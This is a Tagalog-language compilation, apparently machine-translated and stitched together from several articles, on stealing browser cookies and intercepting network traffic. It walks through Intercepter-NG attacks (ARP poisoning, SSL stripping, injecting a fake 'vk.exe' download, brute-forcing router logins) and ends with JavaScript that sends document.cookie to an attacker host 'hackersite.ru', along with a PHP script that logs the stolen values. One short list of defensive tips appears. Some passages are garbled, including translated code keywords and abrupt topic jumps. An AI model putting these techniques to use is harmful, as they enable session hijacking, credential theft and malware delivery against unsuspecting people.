  • Passive. Ang pag-atake ay nakuha sa pamamagitan ng paghiling ng isang partikular na script sa isang web page. Maaaring ipasok ang nakakahamak na code sa iba't ibang anyo sa isang web page (halimbawa, sa site search bar). Ang pinaka-madaling kapitan sa passive XSS ay mga mapagkukunan na hindi nag-filter ng mga HTML tag kapag dumating ang data;
  • Aktibo. Direktang matatagpuan sa server. At sila ay isinaaktibo sa browser ng biktima. Ang mga ito ay aktibong ginagamit ng mga scammer sa lahat ng uri ng mga blog, chat at news feed.

Ang mga hacker ay maingat na "nag-camouflage" ng kanilang mga XSS script upang ang biktima ay hindi maghinala ng anuman. Binabago nila ang extension ng file, ipinapasa ang code bilang isang imahe, hinihimok silang sundin ang link, at akitin sila ng kawili-wiling nilalaman. Bilang isang resulta: ang isang gumagamit ng PC, na hindi makontrol ang kanyang sariling pag-usisa, gamit ang kanyang sariling kamay (na may isang pag-click ng mouse) ay nagpapadala ng mga cookies ng session (na may pag-login at password!) sa may-akda ng script ng XSS - ang kontrabida sa computer.

Pagpapalit ng cookie

Ang lahat ng cookies ay nai-save at ipinadala sa web server (kung saan sila "nagmula") nang walang anumang mga pagbabago - sa kanilang orihinal na anyo - na may parehong mga halaga, string at iba pang data. Ang sinadyang pagbabago ng kanilang mga parameter ay tinatawag na cookie substitution. Sa madaling salita, kapag pinapalitan ang cookies, ang umaatake ay nagpapanggap na nagnanasa. Halimbawa, kapag nagbabayad sa isang online na tindahan, binabago ng cookie ang halaga ng pagbabayad nang pababa - kaya, nangyayari ang "pagtitipid" sa mga pagbili.

Ang mga ninakaw na cookies ng session sa isang social network mula sa account ng ibang tao ay "ipinapasok" sa isa pang session at sa isa pang PC. Ang may-ari ng ninakaw na cookies ay makakakuha ng ganap na access sa account ng biktima (correspondence, content, page settings) hangga't siya ay nasa kanyang page.

Isinasagawa ang "pag-edit" ng cookies gamit ang:

  • “Pamahalaan ang cookies...” mga function sa Opera browser;
  • Cookies Manager at Advanced Cookie Manager addons para sa FireFox;
  • Mga utility ng IECookiesView (Internet Explorer lang);
  • isang text editor tulad ng AkelPad, NotePad o Windows Notepad.

Pisikal na pag-access sa data

Isang napakasimpleng scheme ng pagpapatupad, na binubuo ng ilang hakbang. Ngunit ito ay epektibo lamang kung ang computer ng biktima na may bukas na sesyon, halimbawa VKontakte, ay naiwan nang hindi nag-aalaga (at sa loob ng mahabang panahon!):

  1. Ang isang javascript function ay ipinasok sa address bar ng browser upang ipakita ang lahat ng naka-save na cookies.
  2. Pagkatapos pindutin ang "ENTER" lahat sila ay lalabas sa page.
  3. Ang mga cookies ay kinokopya, nai-save sa isang file, at pagkatapos ay inilipat sa isang flash drive.
  4. Sa ibang PC, pinapalitan ang cookies sa isang bagong session.
  5. Binibigyan ng access ang account ng biktima.

Bilang isang tuntunin, ginagamit ng mga hacker ang mga tool sa itaas (+ iba pa) sa parehong kumbinasyon (dahil ang antas ng proteksyon sa maraming mapagkukunan sa web ay medyo mataas) at hiwalay (kapag ang mga gumagamit ay labis na walang muwang).

XSS + sniffer

  1. Ang isang XSS script ay nilikha, na tumutukoy sa address ng isang online sniffer (alinman sa gawang bahay o isang partikular na serbisyo).
  2. Ang malisyosong code ay nai-save gamit ang extension na .img (format ng imahe).
  3. Ang file na ito ay ina-upload sa isang pahina ng website, chat, o personal na mensahe - kung saan isasagawa ang pag-atake.
  4. Ang atensyon ng gumagamit ay iginuhit sa nilikhang "bitag" (dito nagkakaroon ng puwersa ang social engineering).
  5. Kung ma-trigger ang bitag, ang cookies mula sa browser ng biktima ay haharangin ng sniffer.
  6. Binubuksan ng umaatake ang mga sniffer log at kinukuha ang ninakaw na cookies.
  7. Susunod, nagsasagawa ito ng pagpapalit upang makuha ang mga karapatan ng may-ari ng account gamit ang mga tool sa itaas.

Pinoprotektahan ang cookies mula sa pag-hack

  1. Gumamit ng naka-encrypt na koneksyon (gamit ang mga naaangkop na protocol at mga paraan ng seguridad).
  2. Huwag tumugon sa mga kahina-hinalang link, larawan, o mapang-akit na alok upang maging pamilyar sa "bagong libreng software." Lalo na sa mga estranghero.
  3. Gumamit lamang ng mga pinagkakatiwalaang mapagkukunan ng web.
  4. Tapusin ang awtorisadong session sa pamamagitan ng pag-click sa button na “Logout” (hindi lang pagsasara ng tab!). Lalo na kung nag-log in ka sa iyong account hindi mula sa isang personal na computer, ngunit, halimbawa, mula sa isang PC sa isang Internet cafe.
  5. Huwag gamitin ang tampok na "I-save ang Password" ng browser. Ang nakaimbak na data ng pagpaparehistro ay lubos na nagpapataas ng panganib ng pagnanakaw. Huwag maging tamad, huwag mag-aksaya ng ilang minuto ng oras sa pagpasok ng iyong password at pag-login sa simula ng bawat session.
  6. Pagkatapos ng web surfing - pagbisita sa mga social network, forum, chat, website - tanggalin ang mga naka-save na cookies at i-clear ang cache ng browser.
  7. Regular na i-update ang mga browser at antivirus software.
  8. Gumamit ng mga extension ng browser na nagpoprotekta laban sa mga pag-atake ng XSS (halimbawa, NoScript para sa FF at Google Chrome).
  9. Pana-panahon sa mga account.

At higit sa lahat, huwag mawalan ng pagbabantay at atensyon habang nagpapahinga o nagtatrabaho sa Internet!

Hello mga kaibigan.

Gaya ng ipinangako, nagpapatuloy ako tungkol sa programang Intercepter-ng.

Ngayon ay magkakaroon ng pagsusuri sa pagsasanay.

Babala: hindi mo dapat baguhin ang mga setting o walang pag-iisip na pindutin ang mga setting. Sa pinakamainam, maaaring hindi ito gumana o i-off mo ang Wi-Fi. Nagkaroon ako ng kaso kung saan na-reset ang mga setting ng router. Kaya huwag isipin na ang lahat ay hindi nakakapinsala.

At kahit na may parehong mga setting tulad ng sa akin, hindi ito nangangahulugan na ang lahat ay gagana nang maayos. Sa anumang kaso, para sa mga seryosong kaso kailangan mong pag-aralan ang pagpapatakbo ng lahat ng mga protocol at mode.

Magsisimula na ba tayo?

Pagharang ng cookies at password.

Magsimula tayo sa klasikong pagharang ng mga password at cookies, sa prinsipyo ang proseso ay kapareho ng sa artikulong pagharang ng mga password sa Wi-Fi at pagharang ng cookies sa Wi-Fi, ngunit muli ko itong isusulat, na may mga paglilinaw.

Sa pamamagitan ng paraan, madalas na pinapagana ng mga antivirus ang mga naturang bagay at maiwasan ang pagharang ng data sa pamamagitan ng Wi-FI

Kung ang biktima ay nasa isang Android o IOS na aparato, maaari ka lamang makuntento sa kung ano ang ipinasok ng biktima sa browser lamang (mga password, website, cookies kung ang biktima ay gumagamit ng isang social client para sa VK, pagkatapos ay lumitaw ang mga problema, sila ay simple); huminto sa pagtatrabaho. Sa pinakabagong bersyon ng Intercepter NG, maaari mong lutasin ang problema sa pamamagitan ng pagpapalit ng sertipiko ng biktima. Higit pa tungkol dito mamaya.

Una, magpasya kung ano ang kailangan mong makuha mula sa biktima? Marahil ay kailangan mo ng mga password para sa mga social network, o marahil para lamang sa mga website. Marahil ay sapat na ang cookies para makapag-log in ka bilang biktima at gumawa ng isang bagay kaagad, o kailangan mo ng mga password para sa pag-save sa hinaharap. Kailangan mo pa bang pag-aralan ang mga larawang tiningnan ng biktima at ilang pahina, o hindi mo ba kailangan ang basurang ito? Alam mo bang nakapasok na ang biktima sa site (authorized upon transition) o ilalagay na lang niya ang kanyang data?

Kung hindi na kailangang tumanggap ng mga larawan mula sa mga mapagkukunang binibisita mo, mga bahagi ng mga media file at makita ang ilang mga site na naka-save sa isang html file, huwag paganahin ito sa Mga Setting - Ressurection. Bahagyang babawasan nito ang pagkarga sa router.

Ano ang maaaring i-activate sa Mga Setting - kung nakakonekta ka sa pamamagitan ng isang ethernet cable, kailangan mong i-activate ang Spoof Ip/mac. I-activate din ang Cookie killer (tumutulong sa pag-reset ng cookies para makalabas ang biktima sa site). Ang cookie killer ay isang SSL Strip Attack, kaya huwag kalimutang i-activate ito.

Mas mainam din kung ang Promiscious mode ay naka-activate, na nagbibigay-daan sa iyo upang mapabuti ang interception, ngunit hindi lahat ng mga module ay sumusuporta dito... Extreme mode ay maaaring gawin nang wala ito. Sa pamamagitan nito, kung minsan mas maraming port ang naharang, ngunit mayroon ding karagdagang impormasyon + load...

Una, piliin mula sa itaas ang interface kung saan ka nakakonekta sa Internet at ang uri ng koneksyon: Wi-fi o Ethernet kung nakakonekta sa pamamagitan ng cable sa router.

Sa Scan Mode, i-right click sa isang walang laman na field at i-click ang Smart scan. Ang lahat ng mga device sa network ay ma-scan;

O maaari mong itakda ang alinman sa isang IP, pumunta sa mga setting - mode ng eksperto at lagyan ng tsek ang kahon para sa Auto ARP poison, sa kasong ito, idaragdag ng program ang lahat ng nakakonekta at kumonekta sa network.

Ang kailangan lang nating gawin ay lumipat sa Nat mode.

I-click ang configure mitms , dito kakailanganin natin ang SSL mitm at SSL strip.

SSL mitm nagbibigay-daan sa iyo na humarang ng data, bagama't maraming mga browser ang tumugon dito sa pamamagitan ng babala sa biktima.

SSL Strip nagbibigay-daan sa biktima na lumipat mula sa Https secure na protocol patungo sa HTTP, gayundin para gumana ang cookie killer.

Wala na kaming kailangan, i-click ang start arp poison (radiation icon) at hintayin ang aktibidad ng biktima.

Sa seksyong password mode, i-right-click at Ipakita ang mga coolies. Pagkatapos ay maaari kang mag-right-click sa cookie at pumunta sa buong url.

Sa pamamagitan ng paraan, kung ang biktima ay nasa mga social network, mayroong isang pagkakataon na ang kanyang aktibong sulat ay lilitaw sa mode ng Messenger.

Http inject (maglagay ng file sa biktima).

Mmm, medyo isang matamis na pagpipilian.

Maaari mong ilagay ito sa biktima upang ma-download niya ang file. Makakaasa lang tayo na ilulunsad ng biktima ang file. Para sa pagiging totoo, maaari mong suriin kung aling mga site ang binibisita ng biktima at mag-slip ng isang bagay tulad ng isang update.

Halimbawa, kung ang biktima ay nasa VK, pangalanan ang file na vk.exe. Marahil ay ilulunsad ito ng biktima, na magpapasya na ito ay kapaki-pakinabang.

Magsimula na tayo.


Bruteforce mode.

Brute force at mode ng paghula ng password.

Ang isa sa mga paraan para magamit ito ay ang pag-access sa admin panel ng router. Gayundin ang ilang iba pang mga protocol.

Para kay Brutus kailangan mo

Sa Target na server, ipasok ang IP ng router, telnet protocol, username - user name, sa aming kaso Admin.

Sa ibaba ay may isang pindutan na may isang folder na iginuhit dito, i-click mo ito at buksan ang isang listahan ng mga password (sa folder na may programa, misc/pwlist.txt mayroong isang listahan ng mga madalas na ginagamit na mga password, o maaari mong gamitin sarili mong listahan).

Pagkatapos mag-load, pindutin ang start (tatsulok) at uminom ng tsaa.

Kung may mga tugma (may napiling password), hihinto ang programa.

Kailangan mong malaman ang username. Ngunit kung nais mong ma-access ang router, subukan ang karaniwang isa - admin.

Paano gumawa ng brute.

Traffic changer (pagpapalit ng trapiko).

Ang function ay higit pa sa isang biro. Maaari mong baguhin ito upang ang biktima, kapag pumapasok sa isang site, ay pumunta sa isa pa na iyong pinasok.

Sa mode ng trapiko, ilagay ang kahilingan sa kaliwa, ang resulta sa kanan, ngunit may parehong bilang ng mga titik at simbolo, kung hindi, hindi ito gagana.

Halimbawa - sa kaliwa ay ilalagay namin ang query na palitan, sa kanan ay papalitan namin ang test1 sa test2. (lagyan ng check ang kahon para sa Huwag paganahin ang HTTP gzip).

Pagkatapos makapasok, pindutin ang ADD at pagkatapos ay OK.

Panghuli, isang video kung paano maharang ang data mula sa mga kliyente ng iOS, dahil tulad ng alam mo, sa panahon ng pag-atake ng Mitm, ang kanilang mga application ay huminto lamang sa paggana.

Malapit na akong gumawa ng isang video tungkol sa kung ano ang nakasulat sa artikulo.

Ito ay Data interception sa pamamagitan ng Wi-FI.

Iyon lang talaga. Kung may idadagdag ka, magsulat ka, kung may itama ka, magsulat ka na lang.

Hanggang sa susunod.

Ano ang cookie?

Mayroong isang mekanismo na nagpapahintulot sa http server na mag-save ng ilang tekstong impormasyon sa computer ng gumagamit at pagkatapos ay i-access ito. Ang impormasyong ito ay tinatawag na cookie. Sa pangkalahatan, ang bawat cookie ay isang pares: ang pangalan ng isang parameter at ang halaga nito. Ang bawat cookie ay itinalaga rin ang domain kung saan ito nabibilang. Para sa mga kadahilanang pangseguridad, sa lahat ng mga browser ang http server ay pinapayagan lamang na i-access ang cookie ng domain nito. Bukod pa rito, maaaring may petsa ng pag-expire ang cookies, kung saan maiimbak ang mga ito sa computer hanggang sa petsang ito, kahit na isara mo ang lahat ng mga window ng browser.


Bakit mahalaga ang cookies?

Gumagamit ng cookies ang lahat ng multi-user system upang makilala ang user. Mas tiyak, ang kasalukuyang koneksyon ng user sa serbisyo, session ng user. Kung may makakilala sa iyong cookies, makakapag-log in sila sa system sa ngalan mo. Dahil sa ngayon napakakaunting mapagkukunan ng Internet ang nagsusuri ng mga pagbabago sa IP address sa isang session ng user.


Paano palitan o palitan ang cookies?

Ang mga developer ng browser ay hindi nagbibigay ng mga built-in na tool para sa pag-edit ng cookies. Ngunit maaari kang makayanan gamit ang isang regular na notepad.


Hakbang 1: lumikha ng isang text file na may teksto

Bersyon 5.00 ng Windows Registry Editor



@="C:\\IE_ext.htm"

I-save ito sa ilalim ng pangalang IE_ext.reg

Hakbang 2: Gamit ang nilikhang file, magdagdag ng mga pagbabago sa Windows registry.

Hakbang 3: lumikha ng isang text file na may teksto

< script language="javascript">
external.menuArguments.clipboardData.setData("Text" , external.menuArguments.document.cookie);

external.menuArguments.document.cookie= "testname=testvalue; path=/; domain=testdomain.ru";
alert(external.menuArguments.document.cookie);


I-save ito sa ilalim ng pangalang C:\IE_ext.htm

Hakbang 4: Pumunta kami sa website kung saan kami interesado.

Hakbang 5: Mag-right-click sa isang walang laman na espasyo sa page at piliin ang menu item "Paggawa gamit ang Cookies". Payagan ang access sa clipboard. Ang iyong cookies mula sa site na ito ay mapupunta sa clipboard. Maaari mong ipasok ang kanilang notepad at tingnan.


Hakbang 6: Upang baguhin ang ilang cookies, i-edit ang file C:\IE_ext.htm, palitan testname sa ngalan ng cookie, testvalue- sa kahulugan nito, testdomain.ru– sa domain ng site. Kung kinakailangan, magdagdag ng higit pang katulad na mga linya. Para sa kadalian ng kontrol, idinagdag ko sa script ang output ng kasalukuyang cookies bago at pagkatapos ng pagbabago: alert(external.menuArguments.document.cookie);

Hakbang 7: Gawin muli ang Hakbang 5, at pagkatapos ay i-refresh ang pahina.

Bottom line: ia-access namin ang Internet resource na ito gamit ang na-update na cookies.

Paano magnakaw ng cookies gamit ang JavaScript?

Kung ang isang umaatake ay nakakahanap ng pagkakataong magsagawa ng isang arbitrary na JavaScript script sa computer ng biktima, pagkatapos ay mababasa niya ang kasalukuyang cookies nang napakadali. Halimbawa:


var str= document.cookie;

Ngunit magagawa ba niyang ilipat ang mga ito sa kanyang site, dahil, tulad ng itinuro ko kanina, hindi maa-access ng script ng JavaScript ang isang site na matatagpuan sa ibang domain nang walang karagdagang kumpirmasyon? Lumalabas na ang isang script ng JavaScript ay maaaring mag-load ng anumang imahe na matatagpuan sa anumang http server. Kasabay nito, ilipat ang anumang impormasyon ng teksto sa kahilingan sa pag-download sa larawang ito. Halimbawa: http://hackersite.ru/xss.jpg?text_info Kaya kung patakbuhin mo ang code na ito:

var img= bagong Larawan();

img.src= "http://hackersite.ru/xss.jpg?"+ encodeURI(document.cookie);


pagkatapos ay mapupunta ang cookie sa kahilingang i-download ang "larawan" at "pumunta" sa umaatake.

Paano haharapin ang mga naturang kahilingan upang mag-download ng "larawan"?

Kailangan lang ng isang attacker na maghanap ng hosting na may suporta sa PHP at ilagay ang code na tulad nito doon:

$uid=urldecode($_SERVER["QUERY_STRING"]);
$fp=fopen("log.txt","a");
fputs($fp,"$uid\n");
fclose($fp);
?>

Pagkatapos ang lahat ng mga parameter ng kahilingan para sa script na ito ay ise-save sa file log.txt. Ang natitira na lang ay palitan ang naunang inilarawang JavaScript script http://hackersite.ru/xss.jpg sa landas sa php script na ito.


Bottom line

Ipinakita ko lamang ang pinakasimpleng paraan upang pagsamantalahan ang mga kahinaan ng XSS. Ngunit ito ay nagpapatunay na ang pagkakaroon ng hindi bababa sa isang ganoong kahinaan sa isang multi-user na Internet site ay maaaring magpapahintulot sa isang umaatake na gamitin ang mga mapagkukunan nito para sa iyo.